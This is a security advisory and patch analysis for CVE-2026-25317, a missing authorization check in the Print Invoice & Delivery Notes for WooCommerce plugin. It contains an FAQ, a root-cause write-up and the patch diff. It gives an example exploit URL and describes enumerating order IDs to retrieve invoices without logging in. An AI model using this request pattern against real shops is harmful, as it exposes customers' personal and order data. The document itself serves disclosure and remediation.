What is CVE-2026-25317?

CVE-2026-25317 is a medium severity vulnerability in the Print Invoice & Delivery Notes for WooCommerce plugin for WordPress. It is caused by a missing authorization check, allowing unauthenticated attackers to access sensitive order documents without proper validation.

How does this vulnerability work?

The vulnerability allows attackers to send a specially crafted GET request with parameters like ‘print-order’ and ‘action’ to access order documents. The lack of authorization checks for frontend requests means that anyone can retrieve invoices and delivery notes without being logged in.

Who is affected by this vulnerability?

Any WordPress site using the Print Invoice & Delivery Notes for WooCommerce plugin version 5.9.0 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Print Invoice & Delivery Notes plugin. If the version is 5.9.0 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability is patched in version 6.0.0 of the plugin. To fix the issue, update the Print Invoice & Delivery Notes for WooCommerce plugin to the latest version from the WordPress plugin repository.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider temporarily disabling the plugin to prevent unauthorized access. Additionally, review access controls and monitor logs for any suspicious activity related to order document access.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it does not allow for data modification or deletion, it poses a significant risk of unauthorized access to sensitive customer information, which could lead to privacy violations.

What kind of data can be accessed through this vulnerability?

Exploitation of this vulnerability can expose sensitive customer data such as names, billing and shipping addresses, email addresses, phone numbers, and details of purchased items. This information is critical and could be misused for malicious purposes.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can enumerate order IDs by sending crafted GET requests to the vulnerable endpoint. It illustrates the ease of accessing sensitive documents without any authentication, highlighting the severity of the issue.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your server logs for unauthorized access attempts. Change any compromised credentials, notify affected customers, and consider consulting a security professional for a thorough investigation.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing security measures such as web application firewalls (WAF), regular security audits, and user access controls to minimize the risk of future vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-25317: Print Invoice & Delivery Notes for WooCommerce <= 5.9.0 – Missing Authorization (woocommerce-delivery-notes)

CVE ID CVE-2026-25317

Plugin woocommerce-delivery-notes

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 5.9.0

Patched Version 6.0.0

Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25317:
This vulnerability is a missing authorization flaw in the Print Invoice & Delivery Notes for WooCommerce plugin. The vulnerability allows unauthenticated attackers to access order documents, including invoices and delivery notes, without proper validation. The CVSS score of 5.3 reflects a moderate severity issue with confidentiality impact.

The root cause lies in the `template_redirect_admin()` function within `/woocommerce-delivery-notes/includes/class-wcdn-print.php`. Before the patch, the function performed a capability check (`current_user_can(‘edit_shop_orders’)`) only when the request originated from the WordPress admin area (`is_admin()`). This check occurred at line 378. However, the same function also processed print requests from frontend pages like the WooCommerce order tracking page. The vulnerability existed because the function lacked any authorization verification for these frontend requests. Attackers could directly access the print functionality by crafting specific GET parameters.

Exploitation requires an attacker to send a GET request to the site with specific parameters that trigger the print functionality. The primary attack vector uses the `print-order` and `action` parameters. A typical exploit URL would be `https://target.com/?print-order=123&action=print`. The `print-order` parameter contains the target order ID, while the `action` parameter must be set to `print`. Additional parameters like `print-order-type` can specify the document type (invoice, delivery-note, receipt). The vulnerability allows attackers to enumerate valid order IDs and retrieve sensitive order documents containing customer information, addresses, and purchase details.

The patch adds a comprehensive access verification block between lines 426 and 446 in the `template_redirect_admin()` function. For each order ID in the request, the patch now validates access in two ways. First, it checks if the user is logged in. If not, it requires a `guest_token` parameter that must match a token stored as order meta (`_guest_access_token`). The patch uses `hash_equals()` for secure token comparison. This ensures that only users with a valid guest token (generated and provided via legitimate means like email links) or authenticated users with appropriate permissions can access the print functionality. The fix transforms the endpoint from completely open to properly restricted.

Successful exploitation exposes sensitive customer and order data. Attackers can retrieve invoices, delivery notes, and receipts containing full customer names, billing and shipping addresses, email addresses, phone numbers, purchased items, prices, and payment methods. This constitutes a significant data privacy violation under regulations like GDPR. While the vulnerability does not allow modification or deletion of data, the unauthorized access to personal information represents a clear confidentiality breach.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/default-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/default-preview-template.php
@@ -29,12 +29,23 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
 	return;
 }
+// Ensure we always have a valid WC_Order object.
+if ( ! ( $parent_order instanceof WC_Order ) ) {
+	echo '<div class="notices">';
+	esc_html_e(
+		'No valid WooCommerce order found! Please create an order to preview this template.',
+		'woocommerce-delivery-notes'
+	);
+	echo '</div>';
+	return;
+}
+$order = $parent_order; //phpcs:ignore
 ?>

 	<div class="order-brandings">
@@ -197,14 +208,14 @@
 									</span>

 									<?php
-									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item  );
+									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item );
 									if ( null === $item_meta_fields ) {
 										$item_meta_fields = array();
 									}
 									$product_addons            = array();
 									$woocommerce_product_addon = 'woocommerce-product-addons/woocommerce-product-addons.php';
 									if ( in_array( $woocommerce_product_addon, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ), true ) ) {
-										$product_id     = $item['product_id'];
+										$product_id = $item['product_id'];
 										if ( class_exists( 'WC_Product_Addons_Helper' ) ) {
 											$product_addons = WC_Product_Addons_Helper::get_product_addons( $product_id );
 										}
@@ -236,7 +247,7 @@
 										foreach ( $yith_addon_meta_map as $meta_key => $addon ) {
 											if ( isset( $addon['display_label'] ) && isset( $addon['display_value'] ) ) {
 												echo '<br><strong>' . esc_html( $addon['display_label'] ) . ' : </strong>' . wp_kses_post( $addon['display_value'] );
-											} else {
+											} else { // phpcs:ignore
 												if ( isset( $item_meta_fields[ $meta_key ] ) ) {
 													echo '<br><strong>' . esc_html( $meta_key ) . ' : </strong>' . wp_kses_post( $item_meta_fields[ $meta_key ] );
 												}
@@ -246,7 +257,7 @@
 											}
 										}
 									} // --- end handle YITH add-ons ---
-                  // Extra Product Options (ThemeComplete EPO) support.
+									// Extra Product Options (ThemeComplete EPO) support.
 									$epo_data = $item->get_meta( '_tmcartepo_data', true );
 									if ( ! empty( $epo_data ) && is_array( $epo_data ) ) {
 										foreach ( $epo_data as $epo ) {
@@ -362,7 +373,7 @@
 							<td class="total-item-price"></td>
 							<?php if ( 'Total' === $total['label'] ) { ?>
 							<td class="total-quantity"><?php echo wp_kses_post( $total_adjusted_quantity ); ?></td>
-							<?php } else {  ?>
+							<?php } else { ?>
 							<td class="total-quantity"></td>
 							<?php } ?>
 							<td class="total-price"><span><?php echo wp_kses_post( $total['value'] ); ?></span></td>
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/deliverynote-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/deliverynote-preview-template.php
@@ -30,7 +30,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/invoice-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/invoice-preview-template.php
@@ -24,7 +24,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }

 if ( is_null( $parent_order ) ) {
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/receipt-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/receipt-preview-template.php
@@ -30,7 +30,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
@@ -5,7 +5,7 @@
  * @package woocommerce-print-invoice-delivery-notes
  */

-if ( isset( $_GET['wdcn_setting'] ) ) {
+if ( isset( $_GET['wdcn_setting'] ) ) { // phpcs:ignore
 	$setting = htmlspecialchars( $_GET['wdcn_setting'] ); // phpcs:ignore
 	wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' );
 	?>
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-faq.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-faq.php
@@ -19,11 +19,11 @@
 				</button>
 			</h2>
 			<div id="<?php echo esc_attr( 'wcdn_faq_content_' . $i ); ?>" class="accordion-collapse collapse" aria-labelledby="<?php echo esc_attr( 'wcdn_faq_' . $i ); ?>" data-bs-parent="#wcdn_faq">
-				<?php echo $singlefaq['answer']; ?>
+				<?php echo $singlefaq['answer']; // phpcs:ignore?>
 			</div>
 		</div>
 		<?php
-		$i++;
+		++$i;
 	}
 	?>
 </div>
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-filters.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-filters.php
@@ -110,7 +110,7 @@
 			</div>
 		</div>
 		<?php
-		$i++;
+		++$i;
 	}
 	?>
 </div>
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
@@ -138,7 +138,7 @@
 	<div class="col-sm-6 icon-flex">
 	<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'This includes the emails for a new, processing and completed order. On top of that the customer and admin invoice emails will also include the link.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[print_customer]" id="print_customer" value="" <?php echo esc_attr( ( get_option('wcdn_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[print_customer]" id="print_customer" value="" <?php echo esc_attr( ( get_option( 'wcdn_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print link in customer emails', 'woocommerce-delivery-notes' ); ?></label>
@@ -147,7 +147,7 @@
 	<div class="col-sm-2"></div>
 	<div class="col-sm-6 icon-flex">
 		<label class="switch">
-			<input type="checkbox" class="form-control" name="wcdn_general[print_admin]" id="print_admin" value="" <?php echo esc_attr( ( get_option('wcdn_admin_email_print_link', 'yes') == 'yes' ) ? 'checked' : '' ); ?> >
+			<input type="checkbox" class="form-control" name="wcdn_general[print_admin]" id="print_admin" value="" <?php echo esc_attr( ( get_option( 'wcdn_admin_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 			<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print link in admin emails', 'woocommerce-delivery-notes' ); ?></label>
@@ -158,7 +158,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'This includes print button on View Order page and My Account page.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[view_order]" id="view_order" value="" <?php echo esc_attr( ( get_option('wcdn_print_button_on_view_order_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[view_order]" id="view_order" value="" <?php echo esc_attr( ( get_option( 'wcdn_print_button_on_view_order_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print button on View Order page', 'woocommerce-delivery-notes' ); ?></label>
@@ -167,7 +167,7 @@
 	<div class="col-sm-2"></div>
 	<div class="col-sm-6 icon-flex">
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[view_account]" id="view_account" value="" <?php echo esc_attr( ( get_option('wcdn_print_button_on_my_account_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[view_account]" id="view_account" value="" <?php echo esc_attr( ( get_option( 'wcdn_print_button_on_my_account_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print button on My Account page', 'woocommerce-delivery-notes' ); ?></label>
@@ -209,7 +209,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'Show text in right to left direction in Invoice, Print Receipt & Delivery note if you are using languages such as Hebrew, Arabic, etc.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-			<input type="checkbox" class="form-control" name="wcdn_general[page_textdirection]" id="page_textdirection" value="" <?php echo esc_attr( ( get_option('wcdn_rtl_invoice', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+			<input type="checkbox" class="form-control" name="wcdn_general[page_textdirection]" id="page_textdirection" value="" <?php echo esc_attr( ( get_option( 'wcdn_rtl_invoice', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 			<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Print Text from Right to left', 'woocommerce-delivery-notes' ); ?></label>
--- a/woocommerce-delivery-notes/includes/admin/wcdn-admin-function.php
+++ b/woocommerce-delivery-notes/includes/admin/wcdn-admin-function.php
@@ -27,7 +27,7 @@
 		'order_number'                => __( 'Order Number', 'woocommerce-delivery-notes' ),
 		'order_date'                  => __( 'Order Date', 'woocommerce-delivery-notes' ),
 		'payment_method'              => __( 'Payment Method', 'woocommerce-delivery-notes' ),
-		'payment_date'                => __( 'Payment Date', 'woocommerce-delivery-notes' ),
+		'payment_date'                => __( 'Payment Date', 'woocommerce-delivery-notes' ),
 		'billing_address'             => __( 'Billing Address', 'woocommerce-delivery-notes' ),
 		'shipping_address'            => __( 'Shipping Address', 'woocommerce-delivery-notes' ),
 		'email_address'               => __( 'Email Address', 'woocommerce-delivery-notes' ),
--- a/woocommerce-delivery-notes/includes/class-wcdn-print.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-print.php
@@ -249,7 +249,7 @@
 							</li>
 						<?php endforeach; ?>
 					</ul>
-					<?php $package_number++; ?>
+					<?php ++$package_number; ?>
 				</div>
 				<?php
 			endforeach;
@@ -301,9 +301,9 @@
 		public function parse_request( $wp ) {
 			// Map endpoint keys to their query var keys, when another endpoint name was set.
 			foreach ( $this->api_endpoints as $key => $var ) {
-				if ( isset( $_GET[ $var ] ) ) {
+				if ( isset( $_GET[ $var ] ) ) { // phpcs:ignore
 					// changed.
-					$wdn_get_end_point_var  = sanitize_text_field( wp_unslash( $_GET[ $var ] ) );
+					$wdn_get_end_point_var  = sanitize_text_field( wp_unslash( $_GET[ $var ] ) ); // phpcs:ignore
 					$wp->query_vars[ $key ] = $wdn_get_end_point_var;
 				} elseif ( isset( $wp->query_vars[ $var ] ) ) {
 					$wp->query_vars[ $key ] = $wp->query_vars[ $var ];
@@ -376,7 +376,7 @@
 		 */
 		public function template_redirect_admin() {
 			// Let the backend only access the page.
-			// changed.
+			// phpcs:disable
 			if ( is_admin() && current_user_can( 'edit_shop_orders' ) && ! empty( $_REQUEST['print-order'] ) && ! empty( $_REQUEST['action'] ) ) {
 				$type  = ! empty( $_REQUEST['print-order-type'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['print-order-type'] ) ) : null;
 				$email = ! empty( $_REQUEST['print-order-email'] ) ? sanitize_email( wp_unslash( $_REQUEST['print-order-email'] ) ) : null;
@@ -426,6 +426,26 @@
 				die();
 			}

+			/**
+			 * 🔐 ACCESS VERIFICATION
+			 */
+			foreach ( $this->order_ids as $order_id ) {
+				$order = wc_get_order( $order_id );
+				if ( ! $order ) {
+					wp_die( 'Invalid order.' );
+				}
+				if ( ! is_user_logged_in() ) {
+					$provided_token = sanitize_text_field( $_GET['guest_token'] ?? '' );
+					$saved_token    = $order->get_meta( '_guest_access_token' );
+					if ( empty( $provided_token ) || empty( $saved_token ) ) {
+						wp_die( 'Invalid or expired order link.' );
+					}
+					if ( ! hash_equals( $saved_token, $provided_token ) ) {
+						wp_die( 'Invalid or expired order link.' );
+					}
+				}
+			}
+
 			// Load the print template html.
 			$location = $this->get_template_file_location( 'print-order.php' );
 			$args     = array();
@@ -680,8 +700,6 @@
 			$formatted_date = date_i18n( get_option( 'date_format' ), $meta_date );
 			return apply_filters( 'wcdn_order_invoice_date', $formatted_date, $meta_date );
 		}
-
 	}
-
 }
 ?>
--- a/woocommerce-delivery-notes/includes/class-wcdn-settings.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-settings.php
@@ -199,6 +199,9 @@
 			);

 			foreach ( $invoice_defaults as $parent_key => $invoice_default_values ) {
+				if ( ! isset( $invoice_data[ $parent_key ] ) || ! is_array( $invoice_data[ $parent_key ] ) ) {
+					$invoice_data[ $parent_key ] = array();
+				}
 				foreach ( $invoice_default_values as $key => $invoice_default_value ) {
 					if ( ! isset( $invoice_data[ $parent_key ][ $key ] ) || empty( $invoice_data[ $parent_key ][ $key ] ) ) {
 						$invoice_data[ $parent_key ][ $key ] = $invoice_default_value;
@@ -509,7 +512,7 @@
 		 * @param array  $settings Settings fields.
 		 * @param string $section Section name.
 		 */
-		public function generate_template_type_fields( $settings, $section = '' ) {
+		public function generate_template_type_fields( $settings, $section = '' ) { // phpcs:ignore
 			$position = $this->get_setting_position( 'wcdn_email_print_link', $settings );
 			if ( false !== $position ) {
 				$new_settings = array();
@@ -703,12 +706,12 @@
 		 * @param array $insert New array.
 		 * @param int   $position Position to merge at.
 		 */
-		public function array_merge_at( $array, $insert, $position ) {
+		public function array_merge_at( $array, $insert, $position ) { // phpcs:ignore
 			$new_array = array();
 			// if pos is start, just merge them.
 			if ( 0 === $position ) {
 				$new_array = array_merge( $insert, $array );
-			} else {
+			} else { // phpcs:ignore
 				// if pos is end just merge them.
 				if ( $position >= ( count( $array ) - 1 ) ) {
 					$new_array = array_merge( $array, $insert );
--- a/woocommerce-delivery-notes/includes/class-wcdn-theme.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-theme.php
@@ -143,7 +143,7 @@
 				// Pass the email to the url for the tracking and thank you page. This allows to view the print page without logging in.
 				if ( $this->is_woocommerce_tracking_page() ) {
 					// changed.
-					$wdn_order_email = isset( $_REQUEST['order_email'] ) ? sanitize_email( wp_unslash( $_REQUEST['order_email'] ) ) : '';
+					$wdn_order_email = isset( $_REQUEST['order_email'] ) ? sanitize_email( wp_unslash( $_REQUEST['order_email'] ) ) : ''; // phpcs:ignore
 					$print_url       = wcdn_get_print_link( $order_id, $this->get_template_type( $order ), $wdn_order_email );
 				}

@@ -207,7 +207,7 @@
 				echo "n****************************************************nn";
 			else :
 				?>
-				<p><strong><?php echo esc_attr_e( apply_filters( 'wcdn_print_text_in_email', 'Print:', 'woocommerce-delivery-notes' ) ); ?></strong> <a href="<?php echo esc_url_raw( $url ); ?>"><?php echo esc_attr_e( apply_filters( 'wcdn_print_view_in_browser_text_in_email', 'Open print view in browser', 'woocommerce-delivery-notes' ) ); ?></a></p>
+				<p><strong><?php echo esc_attr_e( apply_filters( 'wcdn_print_text_in_email', 'Print:', 'woocommerce-delivery-notes' ) ); ?></strong> <a href="<?php echo esc_url_raw( $url ); ?>"><?php echo esc_attr_e( apply_filters( 'wcdn_print_view_in_browser_text_in_email', 'Open print view in browser', 'woocommerce-delivery-notes' ) ); // phpcs:ignore?></a></p>
 			<?php endif;
 		}

@@ -235,11 +235,8 @@
 		 * Is WooCommerce 'Order Tracking' page
 		 */
 		public function is_woocommerce_tracking_page() {
-			return ( is_page( wc_get_page_id( 'order_tracking' ) ) && isset( $_REQUEST['order_email'] ) ) ? true : false;
+			return ( is_page( wc_get_page_id( 'order_tracking' ) ) && isset( $_REQUEST['order_email'] ) ) ? true : false; // phpcs:ignore
 		}
-
 	}
-
 }
-
 ?>
--- a/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
@@ -75,7 +75,7 @@
 			global $typenow, $pagenow;
 			if ( 'shop_order' === $typenow && 'edit.php' === $pagenow ) {
 				return true;
-			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] ) {
+			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] ) { // phpcs:ignore
 				return true;
 			} else {
 				return false;
@@ -89,7 +89,7 @@
 			global $typenow, $pagenow;
 			if ( 'shop_order' === $typenow && ( 'post.php' === $pagenow || 'post-new.php' === $pagenow ) ) {
 				return true;
-			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] && isset( $_GET['action'] ) && 'new' === $_GET['action'] ) {
+			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] && isset( $_GET['action'] ) && 'new' === $_GET['action'] ) { // phpcs:ignore
 				return true;
 			} else {
 				return false;
@@ -107,14 +107,21 @@
 			?>
 			<?php foreach ( WCDN_Print::$template_registrations as $template_registration ) : ?>
 				<?php if ( 'yes' === get_option( 'wcdn_template_type_' . $template_registration['type'] ) && 'order' !== $template_registration['type'] ) : ?>
-					<?php // phpcs:disable ?>
-					<a href="<?php echo esc_url( wcdn_get_print_link( $wdn_order_id, $template_registration['type'] ) ); ?>" class="button tips print-preview-button <?php echo esc_attr( $template_registration['type'] ); ?>" target="_blank" alt="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>" data-tip="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>">
+					<?php // phpcs:disable
+						$print_url = apply_filters(
+							'wcdn_custom_print_url',
+							wcdn_get_print_link( $wdn_order_id, $template_registration['type'] ),
+							$wdn_order_id,
+							$template_registration['type']
+						);
+						?>
+						<a href="<?php echo esc_url( $print_url ); ?>
+						" class="button tips print-preview-button <?php echo esc_attr( $template_registration['type'] ); ?>" target="_blank" alt="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>" data-tip="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>">
 						<?php esc_html_e( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ); ?>
 					</a>
 					<?php // phpcs:enable ?>
 				<?php endif; ?>
 			<?php endforeach; ?>
-
 			<span class="print-preview-loading spinner"></span>
 			<?php
 		}
@@ -165,9 +172,8 @@
 			$print_url    = htmlspecialchars_decode( wcdn_get_print_link( $post_ids, $template_type ) );
 			$templatetype = ucwords( str_replace( '-', ' ', $template_type ) );

-
 			// WooCommerce orders page URL.
-			if ( class_exists( 'AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController' ) &&
+			if ( class_exists( 'AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController' ) &&
 				wc_get_container()->get( AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController::class )->custom_orders_table_usage_is_enabled() ) {
 				$orders_page_url = admin_url( 'admin.php?page=wc-orders' );
 			} else {
@@ -187,6 +193,7 @@
 			}

 			// Output the modal with Vue.js.
+			// phpcs:disable
 			?>
 			<div id="custom-modal-app">
 				<div v-if="showModal" class="custom-modal">
@@ -210,7 +217,7 @@
 					</div>
 				</div>
 			</div>
-			<script src="https://cdn.jsdelivr.net/npm/vue@2.6.14/dist/vue.js"></script>
+			<script src="<?php echo esc_url( WooCommerce_Delivery_Notes::$plugin_url . 'assets/js/vue.js' ); ?>"></script>
 			<script>
 				document.addEventListener("DOMContentLoaded", function() {
 					new Vue({
@@ -365,10 +372,10 @@
 		public function confirm_bulk_actions() {
 			if ( $this->is_order_edit_page() ) {
 				foreach ( WCDN_Print::$template_registrations as $template_registration ) {
-					if ( isset( $_REQUEST[ 'printed_' . $template_registration['type'] ] ) ) {
+					if ( isset( $_REQUEST[ 'printed_' . $template_registration['type'] ] ) ) { // phpcs:ignore

 						// use singular or plural form.
-						$total   = isset( $_REQUEST['total'] ) ? absint( $_REQUEST['total'] ) : 0;
+						$total   = isset( $_REQUEST['total'] ) ? absint( $_REQUEST['total'] ) : 0; // phpcs:ignore
 						$message = $total <= 1 ? $message = $template_registration['labels']['message'] : $template_registration['labels']['message_plural'];

 						// Print URL - Fix Issue #214: Reflected XSS Vulnerability in Plugin.
--- a/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
@@ -36,7 +36,7 @@
 		 *
 		 * @var string $plugin_version Current plugin version number
 		 */
-		public static $plugin_version = '5.9.0';
+		public static $plugin_version = '6.0.0';

 		/**
 		 * Plugin URL on current installation
@@ -154,7 +154,7 @@
 		 * Define WC Constants.
 		 */
 		private function define_constants() {
-			self::$plugin_basefile_path = dirname( dirname( __FILE__ ) ) . '/woocommerce-delivery-notes.php';
+			self::$plugin_basefile_path = dirname( dirname( __FILE__ ) ) . '/woocommerce-delivery-notes.php'; // phpcs:ignore
 			self::$plugin_basefile      = plugin_basename( self::$plugin_basefile_path );
 			self::$plugin_url           = plugin_dir_url( self::$plugin_basefile );
 			self::$plugin_path          = trailingslashit( dirname( self::$plugin_basefile_path ) );
@@ -270,6 +270,7 @@
 		 * @since 5.0
 		 */
 		public function wcdn_create_dir() {
+			// phpcs:disable
 			$is_action_scheduled = as_next_scheduled_action( 'wcdn_delete_file' );
 			if ( false === $is_action_scheduled ) {
 				as_schedule_recurring_action( time(), 86400, 'wcdn_delete_file' );
--- a/woocommerce-delivery-notes/includes/component/woocommerce-check/ts-woo-active.php
+++ b/woocommerce-delivery-notes/includes/component/woocommerce-check/ts-woo-active.php
@@ -2,7 +2,7 @@
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
-
+// phpcs:disable
 /**
  * WCDN_TS_Woo_Active Class
  *
--- a/woocommerce-delivery-notes/includes/wcdn-all-component.php
+++ b/woocommerce-delivery-notes/includes/wcdn-all-component.php
@@ -1,47 +1,41 @@
 <?php
 /**
  * It will Add all the Boilerplate component when we activate the plugin.
+ *
  * @author  Tyche Softwares
- *
+ * @package WooCommerceDeliveryNotes
  */
+// phpcs:disable
 if ( ! defined( 'ABSPATH' ) ) {
     exit; // Exit if accessed directly.
 }
 if ( ! class_exists( 'WCDN_Component' ) ) {
 	/**
 	 * It will Add all the Boilerplate component when we activate the plugin.
-	 *
+	 *
 	 */
 	class WCDN_Component {
-
 		/**
 		 * It will Add all the Boilerplate component when we activate the plugin.
 		 */
 		public function __construct() {
-
 			$is_admin = is_admin();
-
 			if ( true === $is_admin ) {
                 require_once( "component/woocommerce-check/ts-woo-active.php" );
-
-                $wcdn_plugin_name          = self::ts_get_plugin_name();;
-                $wcdn_locale               = self::ts_get_plugin_locale();
-
-                $wcdn_file_name            = 'woocommerce-delivery-notes/woocommerce-delivery-notes.php';
-                $wcdn_plugin_prefix        = 'wcdn';
-                $wcdn_lite_plugin_prefix   = 'wcdn';
-                $wcdn_plugin_folder_name   = 'woocommerce-delivery-notes/';
-                $wcdn_plugin_dir_name      = dirname ( untrailingslashit( plugin_dir_path ( __FILE__ ) ) ) . '/woocommerce-delivery-notes.php' ;
-                $wcdn_plugin_url           = dirname ( untrailingslashit( plugins_url( '/', __FILE__ ) ) );
+                $wcdn_plugin_name        = self::ts_get_plugin_name();;
+                $wcdn_locale             = self::ts_get_plugin_locale();
+                $wcdn_file_name          = 'woocommerce-delivery-notes/woocommerce-delivery-notes.php';
+                $wcdn_plugin_prefix      = 'wcdn';
+                $wcdn_lite_plugin_prefix = 'wcdn';
+                $wcdn_plugin_folder_name = 'woocommerce-delivery-notes/';
+                $wcdn_plugin_dir_name    = dirname( untrailingslashit( plugin_dir_path( __FILE__ ) ) ) . '/woocommerce-delivery-notes.php' ;
+                $wcdn_plugin_url         = dirname( untrailingslashit( plugins_url( '/', __FILE__ ) ) );

                 $wcdn_get_previous_version = get_option( 'wcdn_version', '1' );
-
                 $wcdn_blog_post_link       = 'https://www.tychesoftwares.com/docs/docs/woocommerce-print-invoice-delivery-note/usage-tracking/';
-
                 $wcdn_plugins_page         = '';
                 $wcdn_plugin_slug          = '';
                 $wcdn_pro_file_name        = '';
-
                 $wcdn_settings_page        = 'admin.php?page=wc-settings&tab=wcdn-settings';

                 if ( strpos( $_SERVER['REQUEST_URI'], 'plugins.php' ) !== false || strpos( $_SERVER['REQUEST_URI'], 'action=deactivate' ) !== false || ( strpos( $_SERVER['REQUEST_URI'], 'admin-ajax.php' ) !== false && isset( $_POST['action'] ) && $_POST['action'] === 'tyche_plugin_deactivation_submit_action' ) ) { //phpcs:ignore
@@ -94,13 +88,12 @@
          * @return string $ts_plugin_domain Name of the Plugin domain
          */
         public static function ts_get_plugin_locale () {
-            $ordd_plugin_dir =  dirname ( dirname ( __FILE__ ) );
+            $ordd_plugin_dir  =  dirname ( dirname( __FILE__ ) );
             $ordd_plugin_dir .= '/woocommerce-delivery-notes.php';
-
             $ts_plugin_domain = '';
-            $plugin_data = get_file_data( $ordd_plugin_dir, array( 'domain' => 'Text Domain' ) );
